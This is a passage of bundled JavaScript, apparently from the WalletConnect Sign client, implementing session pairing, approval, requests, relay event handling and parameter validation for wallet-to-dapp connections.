                    const B = $4a472e843fedf2e2$var$F($4a472e843fedf2e2$var$w({}, y), {
                        requiredNamespaces: y.requiredNamespaces,
                        optionalNamespaces: y.optionalNamespaces
                    });
                    await this.client.session.set(y.topic, B), await this.setExpiry(y.topic, y.expiry), l && await this.client.core.pairing.updateMetadata({
                        topic: l,
                        metadata: y.peer.metadata
                    }), T(B);
                }
            }), !l) {
                const { message: f } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("NO_MATCHING_KEY", `connect() pairing topic: ${l}`);
                throw new Error(f);
            }
            const L = await this.sendRequest(l, "wc_sessionPropose", E), he = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.FIVE_MINUTES));
            return await this.setProposal(L, $4a472e843fedf2e2$var$w({
                id: L,
                expiry: he
            }, E)), {
                uri: h,
                approval: K
            };
        }, this.pair = async (e)=>(this.isInitialized(), await this.client.core.pairing.pair(e)), this.approve = async (e)=>{
            this.isInitialized(), await this.isValidApprove(e);
            const { id: s, relayProtocol: t, namespaces: i, sessionProperties: n } = e, o = this.client.proposal.get(s);
            let { pairingTopic: a, proposer: l, requiredNamespaces: h, optionalNamespaces: I } = o;
            a = a || "", (0, $a5d33cfc7f8e5437$export$16a0268bc22b47b0)(h) || (h = (0, $a5d33cfc7f8e5437$export$a8daa26a7c60ef90)(i, "approve()"));
            const g = await this.client.core.crypto.generateKeyPair(), E = l.publicKey, u = await this.client.core.crypto.generateSharedKey(g, E);
            a && s && (await this.client.core.pairing.updateMetadata({
                topic: a,
                metadata: l.metadata
            }), await this.sendResult(s, a, {
                relay: {
                    protocol: t ?? "irn"
                },
                responderPublicKey: g
            }), await this.client.proposal.delete(s, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), await this.client.core.pairing.activate({
                topic: a
            }));
            const T = $4a472e843fedf2e2$var$w({
                relay: {
                    protocol: t ?? "irn"
                },
                namespaces: i,
                requiredNamespaces: h,
                optionalNamespaces: I,
                pairingTopic: a,
                controller: {
                    publicKey: g,
                    metadata: this.client.metadata
                },
                expiry: (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)($4a472e843fedf2e2$export$84b1b9dbcdea0475)
            }, n && {
                sessionProperties: n
            });
            await this.client.core.relayer.subscribe(u), await this.sendRequest(u, "wc_sessionSettle", T);
            const K = $4a472e843fedf2e2$var$F($4a472e843fedf2e2$var$w({}, T), {
                topic: u,
                pairingTopic: a,
                acknowledged: !1,
                self: T.controller,
                peer: {
                    publicKey: l.publicKey,
                    metadata: l.metadata
                },
                controller: g
            });
            return await this.client.session.set(u, K), await this.setExpiry(u, (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)($4a472e843fedf2e2$export$84b1b9dbcdea0475)), {
                topic: u,
                acknowledged: ()=>new Promise((L)=>setTimeout(()=>L(this.client.session.get(u)), 500))
            };
        }, this.reject = async (e)=>{
            this.isInitialized(), await this.isValidReject(e);
            const { id: s, reason: t } = e, { pairingTopic: i } = this.client.proposal.get(s);
            i && (await this.sendError(s, i, t), await this.client.proposal.delete(s, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")));
        }, this.update = async (e)=>{
            this.isInitialized(), await this.isValidUpdate(e);
            const { topic: s, namespaces: t } = e, i = await this.sendRequest(s, "wc_sessionUpdate", {
                namespaces: t
            }), { done: n, resolve: o, reject: a } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)();
            return this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_update", i), ({ error: l })=>{
                l ? a(l) : o();
            }), await this.client.session.update(s, {
                namespaces: t
            }), {
                acknowledged: n
            };
        }, this.extend = async (e)=>{
            this.isInitialized(), await this.isValidExtend(e);
            const { topic: s } = e, t = await this.sendRequest(s, "wc_sessionExtend", {}), { done: i, resolve: n, reject: o } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)();
            return this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_extend", t), ({ error: a })=>{
                a ? o(a) : n();
            }), await this.setExpiry(s, (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)($4a472e843fedf2e2$export$84b1b9dbcdea0475)), {
                acknowledged: i
            };
        }, this.request = async (e)=>{
            this.isInitialized(), await this.isValidRequest(e);
            const { chainId: s, request: t, topic: i, expiry: n } = e, o = await this.sendRequest(i, "wc_sessionRequest", {
                request: t,
                chainId: s
            }, n), { done: a, resolve: l, reject: h } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)(n);
            this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_request", o), ({ error: g, result: E })=>{
                g ? h(g) : l(E);
            }), this.client.events.emit("session_request_sent", {
                topic: i,
                request: t,
                chainId: s,
                id: o
            });
            const I = await this.client.core.storage.getItem($4a472e843fedf2e2$export$a26ccd6441b7d638);
            return (0, $a5d33cfc7f8e5437$export$694a208c8abca99a)({
                id: o,
                topic: i,
                wcDeepLink: I
            }), await a();
        }, this.respond = async (e)=>{
            this.isInitialized(), await this.isValidRespond(e);
            const { topic: s, response: t } = e, { id: i } = t;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(t) ? await this.sendResult(i, s, t.result) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(t) && await this.sendError(i, s, t.error), this.cleanupAfterResponse(e);
        }, this.ping = async (e)=>{
            this.isInitialized(), await this.isValidPing(e);
            const { topic: s } = e;
            if (this.client.session.keys.includes(s)) {
                const t = await this.sendRequest(s, "wc_sessionPing", {}), { done: i, resolve: n, reject: o } = (0, $a5d33cfc7f8e5437$export$cbf9e3cc9ffc85cb)();
                this.events.once((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_ping", t), ({ error: a })=>{
                    a ? o(a) : n();
                }), await i();
            } else this.client.core.pairing.pairings.keys.includes(s) && await this.client.core.pairing.ping({
                topic: s
            });
        }, this.emit = async (e)=>{
            this.isInitialized(), await this.isValidEmit(e);
            const { topic: s, event: t, chainId: i } = e;
            await this.sendRequest(s, "wc_sessionEvent", {
                event: t,
                chainId: i
            });
        }, this.disconnect = async (e)=>{
            this.isInitialized(), await this.isValidDisconnect(e);
            const { topic: s } = e;
            if (this.client.session.keys.includes(s)) {
                const t = (0, $3bb3ddc7bbc938cc$export$799a3db5df197877)().toString();
                let i;
                const n = (o)=>{
                    o?.id.toString() === t && (this.client.core.relayer.events.removeListener((0, $e9e439c110f17033$export$d56245796e2837d).message_ack, n), i());
                };
                await Promise.all([
                    new Promise((o)=>{
                        i = o, this.client.core.relayer.on((0, $e9e439c110f17033$export$d56245796e2837d).message_ack, n);
                    }),
                    this.sendRequest(s, "wc_sessionDelete", (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED"), void 0, t)
                ]), await this.deleteSession(s);
            } else await this.client.core.pairing.disconnect({
                topic: s
            });
        }, this.find = (e)=>(this.isInitialized(), this.client.session.getAll().filter((s)=>(0, $a5d33cfc7f8e5437$export$6fc4971bf8f326a)(s, e))), this.getPendingSessionRequests = ()=>(this.isInitialized(), this.client.pendingRequest.getAll()), this.cleanupDuplicatePairings = async (e)=>{
            if (e.pairingTopic) try {
                const s = this.client.core.pairing.pairings.get(e.pairingTopic), t = this.client.core.pairing.pairings.getAll().filter((i)=>{
                    var n, o;
                    return ((n = i.peerMetadata) == null ? void 0 : n.url) && ((o = i.peerMetadata) == null ? void 0 : o.url) === e.peer.metadata.url && i.topic && i.topic !== s.topic;
                });
                if (t.length === 0) return;
                this.client.logger.info(`Cleaning up ${t.length} duplicate pairing(s)`), await Promise.all(t.map((i)=>this.client.core.pairing.disconnect({
                        topic: i.topic
                    }))), this.client.logger.info("Duplicate pairings clean up finished");
            } catch (s) {
                this.client.logger.error(s);
            }
        }, this.deleteSession = async (e, s)=>{
            const { self: t } = this.client.session.get(e);
            await this.client.core.relayer.unsubscribe(e), this.client.session.delete(e, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), this.client.core.crypto.keychain.has(t.publicKey) && await this.client.core.crypto.deleteKeyPair(t.publicKey), this.client.core.crypto.keychain.has(e) && await this.client.core.crypto.deleteSymKey(e), s || this.client.core.expirer.del(e), this.client.core.storage.removeItem($4a472e843fedf2e2$export$a26ccd6441b7d638).catch((i)=>this.client.logger.warn(i));
        }, this.deleteProposal = async (e, s)=>{
            await Promise.all([
                this.client.proposal.delete(e, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")),
                s ? Promise.resolve() : this.client.core.expirer.del(e)
            ]);
        }, this.deletePendingSessionRequest = async (e, s, t = !1)=>{
            await Promise.all([
                this.client.pendingRequest.delete(e, s),
                t ? Promise.resolve() : this.client.core.expirer.del(e)
            ]), this.requestQueue.requests = this.requestQueue.requests.filter((i)=>i.id !== e), t && (this.requestQueue.state = $4a472e843fedf2e2$export$a8430bf2cf90f262.idle);
        }, this.setExpiry = async (e, s)=>{
            this.client.session.keys.includes(e) && await this.client.session.update(e, {
                expiry: s
            }), this.client.core.expirer.set(e, s);
        }, this.setProposal = async (e, s)=>{
            await this.client.proposal.set(e, s), this.client.core.expirer.set(e, s.expiry);
        }, this.setPendingSessionRequest = async (e)=>{
            const s = $4a472e843fedf2e2$export$4edb1ca37014192d.wc_sessionRequest.req.ttl, { id: t, topic: i, params: n } = e;
            await this.client.pendingRequest.set(t, {
                id: t,
                topic: i,
                params: n
            }), s && this.client.core.expirer.set(t, (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)(s));
        }, this.sendRequest = async (e, s, t, i, n)=>{
            const o = (0, $3bb3ddc7bbc938cc$export$11d081ebb32d4398)(s, t);
            if ((0, $a5d33cfc7f8e5437$export$4e09c449d6c407f7)() && $4a472e843fedf2e2$export$63c37d8ae5931ad5.includes(s)) {
                const h = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(JSON.stringify(o));
                await this.client.core.verify.register({
                    attestationId: h
                });
            }
            const a = await this.client.core.crypto.encode(e, o), l = $4a472e843fedf2e2$export$4edb1ca37014192d[s].req;
            return i && (l.ttl = i), n && (l.id = n), this.client.core.history.set(e, o), this.client.core.relayer.publish(e, a, l), o.id;
        }, this.sendResult = async (e, s, t)=>{
            const i = (0, $3bb3ddc7bbc938cc$export$478fdea01c2a3198)(e, t), n = await this.client.core.crypto.encode(s, i), o = await this.client.core.history.get(s, e), a = $4a472e843fedf2e2$export$4edb1ca37014192d[o.request.method].res;
            this.client.core.relayer.publish(s, n, a), await this.client.core.history.resolve(i);
        }, this.sendError = async (e, s, t)=>{
            const i = (0, $3bb3ddc7bbc938cc$export$9f7302ae26c3f77)(e, t), n = await this.client.core.crypto.encode(s, i), o = await this.client.core.history.get(s, e), a = $4a472e843fedf2e2$export$4edb1ca37014192d[o.request.method].res;
            this.client.core.relayer.publish(s, n, a), await this.client.core.history.resolve(i);
        }, this.cleanup = async ()=>{
            const e = [], s = [];
            this.client.session.getAll().forEach((t)=>{
                (0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(t.expiry) && e.push(t.topic);
            }), this.client.proposal.getAll().forEach((t)=>{
                (0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(t.expiry) && s.push(t.id);
            }), await Promise.all([
                ...e.map((t)=>this.deleteSession(t)),
                ...s.map((t)=>this.deleteProposal(t))
            ]);
        }, this.onRelayEventRequest = (e)=>{
            const { topic: s, payload: t } = e, i = t.method;
            switch(i){
                case "wc_sessionPropose":
                    return this.onSessionProposeRequest(s, t);
                case "wc_sessionSettle":
                    return this.onSessionSettleRequest(s, t);
                case "wc_sessionUpdate":
                    return this.onSessionUpdateRequest(s, t);
                case "wc_sessionExtend":
                    return this.onSessionExtendRequest(s, t);
                case "wc_sessionPing":
                    return this.onSessionPingRequest(s, t);
                case "wc_sessionDelete":
                    return this.onSessionDeleteRequest(s, t);
                case "wc_sessionRequest":
                    return this.onSessionRequest(s, t);
                case "wc_sessionEvent":
                    return this.onSessionEventRequest(s, t);
                default:
                    return this.client.logger.info(`Unsupported request method ${i}`);
            }
        }, this.onRelayEventResponse = async (e)=>{
            const { topic: s, payload: t } = e, i = (await this.client.core.history.get(s, t.id)).request.method;
            switch(i){
                case "wc_sessionPropose":
                    return this.onSessionProposeResponse(s, t);
                case "wc_sessionSettle":
                    return this.onSessionSettleResponse(s, t);
                case "wc_sessionUpdate":
                    return this.onSessionUpdateResponse(s, t);
                case "wc_sessionExtend":
                    return this.onSessionExtendResponse(s, t);
                case "wc_sessionPing":
                    return this.onSessionPingResponse(s, t);
                case "wc_sessionRequest":
                    return this.onSessionRequestResponse(s, t);
                default:
                    return this.client.logger.info(`Unsupported response method ${i}`);
            }
        }, this.onRelayEventUnknownPayload = (e)=>{
            const { topic: s } = e, { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `Decoded payload on topic ${s} is not identifiable as a JSON-RPC request or a response.`);
            throw new Error(t);
        }, this.onSessionProposeRequest = async (e, s)=>{
            const { params: t, id: i } = s;
            try {
                this.isValidConnect($4a472e843fedf2e2$var$w({}, s.params));
                const n = (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)((0, $aG48A.FIVE_MINUTES)), o = $4a472e843fedf2e2$var$w({
                    id: i,
                    pairingTopic: e,
                    expiry: n
                }, t);
                await this.setProposal(i, o);
                const a = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(JSON.stringify(s)), l = await this.getVerifyContext(a, o.proposer.metadata);
                this.client.events.emit("session_proposal", {
                    id: i,
                    params: o,
                    verifyContext: l
                });
            } catch (n) {
                await this.sendError(i, e, n), this.client.logger.error(n);
            }
        }, this.onSessionProposeResponse = async (e, s)=>{
            const { id: t } = s;
            if ((0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s)) {
                const { result: i } = s;
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    result: i
                });
                const n = this.client.proposal.get(t);
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    proposal: n
                });
                const o = n.proposer.publicKey;
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    selfPublicKey: o
                });
                const a = i.responderPublicKey;
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    peerPublicKey: a
                });
                const l = await this.client.core.crypto.generateSharedKey(o, a);
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    sessionTopic: l
                });
                const h = await this.client.core.relayer.subscribe(l);
                this.client.logger.trace({
                    type: "method",
                    method: "onSessionProposeResponse",
                    subscriptionId: h
                }), await this.client.core.pairing.activate({
                    topic: e
                });
            } else (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && (await this.client.proposal.delete(t, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_connect"), {
                error: s.error
            }));
        }, this.onSessionSettleRequest = async (e, s)=>{
            const { id: t, params: i } = s;
            try {
                this.isValidSessionSettleRequest(i);
                const { relay: n, controller: o, expiry: a, namespaces: l, requiredNamespaces: h, optionalNamespaces: I, sessionProperties: g, pairingTopic: E } = s.params, u = $4a472e843fedf2e2$var$w({
                    topic: e,
                    relay: n,
                    expiry: a,
                    namespaces: l,
                    acknowledged: !0,
                    pairingTopic: E,
                    requiredNamespaces: h,
                    optionalNamespaces: I,
                    controller: o.publicKey,
                    self: {
                        publicKey: "",
                        metadata: this.client.metadata
                    },
                    peer: {
                        publicKey: o.publicKey,
                        metadata: o.metadata
                    }
                }, g && {
                    sessionProperties: g
                });
                await this.sendResult(s.id, e, !0), this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_connect"), {
                    session: u
                }), this.cleanupDuplicatePairings(u);
            } catch (n) {
                await this.sendError(t, e, n), this.client.logger.error(n);
            }
        }, this.onSessionSettleResponse = async (e, s)=>{
            const { id: t } = s;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? (await this.client.session.update(e, {
                acknowledged: !0
            }), this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_approve", t), {})) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && (await this.client.session.delete(e, (0, $a5d33cfc7f8e5437$export$8203ef1531c8b5b5)("USER_DISCONNECTED")), this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_approve", t), {
                error: s.error
            }));
        }, this.onSessionUpdateRequest = async (e, s)=>{
            const { params: t, id: i } = s;
            try {
                this.isValidUpdate($4a472e843fedf2e2$var$w({
                    topic: e
                }, t)), await this.client.session.update(e, {
                    namespaces: t.namespaces
                }), await this.sendResult(i, e, !0), this.client.events.emit("session_update", {
                    id: i,
                    topic: e,
                    params: t
                });
            } catch (n) {
                await this.sendError(i, e, n), this.client.logger.error(n);
            }
        }, this.onSessionUpdateResponse = (e, s)=>{
            const { id: t } = s;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_update", t), {}) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_update", t), {
                error: s.error
            });
        }, this.onSessionExtendRequest = async (e, s)=>{
            const { id: t } = s;
            try {
                this.isValidExtend({
                    topic: e
                }), await this.setExpiry(e, (0, $a5d33cfc7f8e5437$export$b136d03015bfc12)($4a472e843fedf2e2$export$84b1b9dbcdea0475)), await this.sendResult(t, e, !0), this.client.events.emit("session_extend", {
                    id: t,
                    topic: e
                });
            } catch (i) {
                await this.sendError(t, e, i), this.client.logger.error(i);
            }
        }, this.onSessionExtendResponse = (e, s)=>{
            const { id: t } = s;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_extend", t), {}) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_extend", t), {
                error: s.error
            });
        }, this.onSessionPingRequest = async (e, s)=>{
            const { id: t } = s;
            try {
                this.isValidPing({
                    topic: e
                }), await this.sendResult(t, e, !0), this.client.events.emit("session_ping", {
                    id: t,
                    topic: e
                });
            } catch (i) {
                await this.sendError(t, e, i), this.client.logger.error(i);
            }
        }, this.onSessionPingResponse = (e, s)=>{
            const { id: t } = s;
            setTimeout(()=>{
                (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_ping", t), {}) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_ping", t), {
                    error: s.error
                });
            }, 500);
        }, this.onSessionDeleteRequest = async (e, s)=>{
            const { id: t } = s;
            try {
                this.isValidDisconnect({
                    topic: e,
                    reason: s.params
                }), await Promise.all([
                    new Promise((i)=>{
                        this.client.core.relayer.once((0, $e9e439c110f17033$export$d56245796e2837d).publish, async ()=>{
                            i(await this.deleteSession(e));
                        });
                    }),
                    this.sendResult(t, e, !0)
                ]), this.client.events.emit("session_delete", {
                    id: t,
                    topic: e
                });
            } catch (i) {
                this.client.logger.error(i);
            }
        }, this.onSessionRequest = async (e, s)=>{
            const { id: t, params: i } = s;
            try {
                this.isValidRequest($4a472e843fedf2e2$var$w({
                    topic: e
                }, i)), await this.setPendingSessionRequest({
                    id: t,
                    topic: e,
                    params: i
                }), this.addRequestToQueue({
                    id: t,
                    topic: e,
                    params: i
                }), await this.processRequestQueue();
            } catch (n) {
                await this.sendError(t, e, n), this.client.logger.error(n);
            }
        }, this.onSessionRequestResponse = (e, s)=>{
            const { id: t } = s;
            (0, $2e45abd1d679ec32$export$cb3d3b20e3223d77)(s) ? this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_request", t), {
                result: s.result
            }) : (0, $2e45abd1d679ec32$export$5662a1047b4d1d15)(s) && this.events.emit((0, $a5d33cfc7f8e5437$export$e3eb27ce66c0f6d9)("session_request", t), {
                error: s.error
            });
        }, this.onSessionEventRequest = async (e, s)=>{
            const { id: t, params: i } = s;
            try {
                this.isValidEmit($4a472e843fedf2e2$var$w({
                    topic: e
                }, i)), this.client.events.emit("session_event", {
                    id: t,
                    topic: e,
                    params: i
                });
            } catch (n) {
                await this.sendError(t, e, n), this.client.logger.error(n);
            }
        }, this.addRequestToQueue = (e)=>{
            this.requestQueue.requests.push(e);
        }, this.cleanupAfterResponse = (e)=>{
            this.deletePendingSessionRequest(e.response.id, {
                message: "fulfilled",
                code: 0
            }), setTimeout(()=>{
                this.requestQueue.state = $4a472e843fedf2e2$export$a8430bf2cf90f262.idle, this.processRequestQueue();
            }, (0, $aG48A.toMiliseconds)(this.requestQueueDelay));
        }, this.processRequestQueue = async ()=>{
            if (this.requestQueue.state === $4a472e843fedf2e2$export$a8430bf2cf90f262.active) {
                this.client.logger.info("session request queue is already active.");
                return;
            }
            const e = this.requestQueue.requests[0];
            if (!e) {
                this.client.logger.info("session request queue is empty.");
                return;
            }
            try {
                const { id: s, topic: t, params: i } = e, n = (0, $a5d33cfc7f8e5437$export$d4c241cec96564c1)(JSON.stringify({
                    id: s,
                    params: i
                })), o = this.client.session.get(t), a = await this.getVerifyContext(n, o.peer.metadata);
                this.requestQueue.state = $4a472e843fedf2e2$export$a8430bf2cf90f262.active, this.client.events.emit("session_request", {
                    id: s,
                    topic: t,
                    params: i,
                    verifyContext: a
                });
            } catch (s) {
                this.client.logger.error(s);
            }
        }, this.isValidConnect = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `connect() params: ${JSON.stringify(e)}`);
                throw new Error(a);
            }
            const { pairingTopic: s, requiredNamespaces: t, optionalNamespaces: i, sessionProperties: n, relays: o } = e;
            if ((0, $a5d33cfc7f8e5437$export$fce6876652108ab)(s) || await this.isValidPairingTopic(s), !(0, $a5d33cfc7f8e5437$export$6294c30b976bd21e)(o, !0)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `connect() relays: ${o}`);
                throw new Error(a);
            }
            !(0, $a5d33cfc7f8e5437$export$fce6876652108ab)(t) && (0, $a5d33cfc7f8e5437$export$16a0268bc22b47b0)(t) !== 0 && this.validateNamespaces(t, "requiredNamespaces"), !(0, $a5d33cfc7f8e5437$export$fce6876652108ab)(i) && (0, $a5d33cfc7f8e5437$export$16a0268bc22b47b0)(i) !== 0 && this.validateNamespaces(i, "optionalNamespaces"), (0, $a5d33cfc7f8e5437$export$fce6876652108ab)(n) || this.validateSessionProps(n, "sessionProperties");
        }, this.validateNamespaces = (e, s)=>{
            const t = (0, $a5d33cfc7f8e5437$export$9e2b2cae22c6a8b3)(e, "connect()", s);
            if (t) throw new Error(t.message);
        }, this.isValidApprove = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) throw new Error((0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `approve() params: ${e}`).message);
            const { id: s, namespaces: t, relayProtocol: i, sessionProperties: n } = e;
            await this.isValidProposalId(s);
            const o = this.client.proposal.get(s), a = (0, $a5d33cfc7f8e5437$export$93f7b81dc815a714)(t, "approve()");
            if (a) throw new Error(a.message);
            const l = (0, $a5d33cfc7f8e5437$export$ba5b0a4b585cd1b4)(o.requiredNamespaces, t, "approve()");
            if (l) throw new Error(l.message);
            if (!(0, $a5d33cfc7f8e5437$export$ee898ca48ab56c74)(i, !0)) {
                const { message: h } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `approve() relayProtocol: ${i}`);
                throw new Error(h);
            }
            (0, $a5d33cfc7f8e5437$export$fce6876652108ab)(n) || this.validateSessionProps(n, "sessionProperties");
        }, this.isValidReject = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `reject() params: ${e}`);
                throw new Error(i);
            }
            const { id: s, reason: t } = e;
            if (await this.isValidProposalId(s), !(0, $a5d33cfc7f8e5437$export$766fe78377d96f2a)(t)) {
                const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `reject() reason: ${JSON.stringify(t)}`);
                throw new Error(i);
            }
        }, this.isValidSessionSettleRequest = (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: l } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `onSessionSettleRequest() params: ${e}`);
                throw new Error(l);
            }
            const { relay: s, controller: t, namespaces: i, expiry: n } = e;
            if (!(0, $a5d33cfc7f8e5437$export$1b3fc298be8c9a7b)(s)) {
                const { message: l } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", "onSessionSettleRequest() relay protocol should be a string");
                throw new Error(l);
            }
            const o = (0, $a5d33cfc7f8e5437$export$5e1c5c89613c213f)(t, "onSessionSettleRequest()");
            if (o) throw new Error(o.message);
            const a = (0, $a5d33cfc7f8e5437$export$93f7b81dc815a714)(i, "onSessionSettleRequest()");
            if (a) throw new Error(a.message);
            if ((0, $a5d33cfc7f8e5437$export$57947cfd429801a2)(n)) {
                const { message: l } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("EXPIRED", "onSessionSettleRequest()");
                throw new Error(l);
            }
        }, this.isValidUpdate = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `update() params: ${e}`);
                throw new Error(a);
            }
            const { topic: s, namespaces: t } = e;
            await this.isValidSessionTopic(s);
            const i = this.client.session.get(s), n = (0, $a5d33cfc7f8e5437$export$93f7b81dc815a714)(t, "update()");
            if (n) throw new Error(n.message);
            const o = (0, $a5d33cfc7f8e5437$export$ba5b0a4b585cd1b4)(i.requiredNamespaces, t, "update()");
            if (o) throw new Error(o.message);
        }, this.isValidExtend = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `extend() params: ${e}`);
                throw new Error(t);
            }
            const { topic: s } = e;
            await this.isValidSessionTopic(s);
        }, this.isValidRequest = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() params: ${e}`);
                throw new Error(a);
            }
            const { topic: s, request: t, chainId: i, expiry: n } = e;
            await this.isValidSessionTopic(s);
            const { namespaces: o } = this.client.session.get(s);
            if (!(0, $a5d33cfc7f8e5437$export$144fc36610eb6522)(o, i)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() chainId: ${i}`);
                throw new Error(a);
            }
            if (!(0, $a5d33cfc7f8e5437$export$1a2af3c017fb6d42)(t)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() ${JSON.stringify(t)}`);
                throw new Error(a);
            }
            if (!(0, $a5d33cfc7f8e5437$export$8db4804e3a6de711)(o, i, t.method)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() method: ${t.method}`);
                throw new Error(a);
            }
            if (n && !(0, $a5d33cfc7f8e5437$export$59fba2af1ac782b)(n, $4a472e843fedf2e2$export$409f0c0a13a1b7c6)) {
                const { message: a } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `request() expiry: ${n}. Expiry must be a number (in seconds) between ${$4a472e843fedf2e2$export$409f0c0a13a1b7c6.min} and ${$4a472e843fedf2e2$export$409f0c0a13a1b7c6.max}`);
                throw new Error(a);
            }
        }, this.isValidRespond = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `respond() params: ${e}`);
                throw new Error(i);
            }
            const { topic: s, response: t } = e;
            if (await this.isValidSessionTopic(s), !(0, $a5d33cfc7f8e5437$export$1ae38cf0a848f651)(t)) {
                const { message: i } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `respond() response: ${JSON.stringify(t)}`);
                throw new Error(i);
            }
        }, this.isValidPing = async (e)=>{
            if (!(0, $a5d33cfc7f8e5437$export$b3f5fcca1d210454)(e)) {
                const { message: t } = (0, $a5d33cfc7f8e5437$export$500d4c4a8fafe35)("MISSING_OR_INVALID", `ping() params: ${e}`);
                throw new Error(t);
            }
            const { topic: s } = e;
            await this.isValidSessionOrPairingTopic(s);
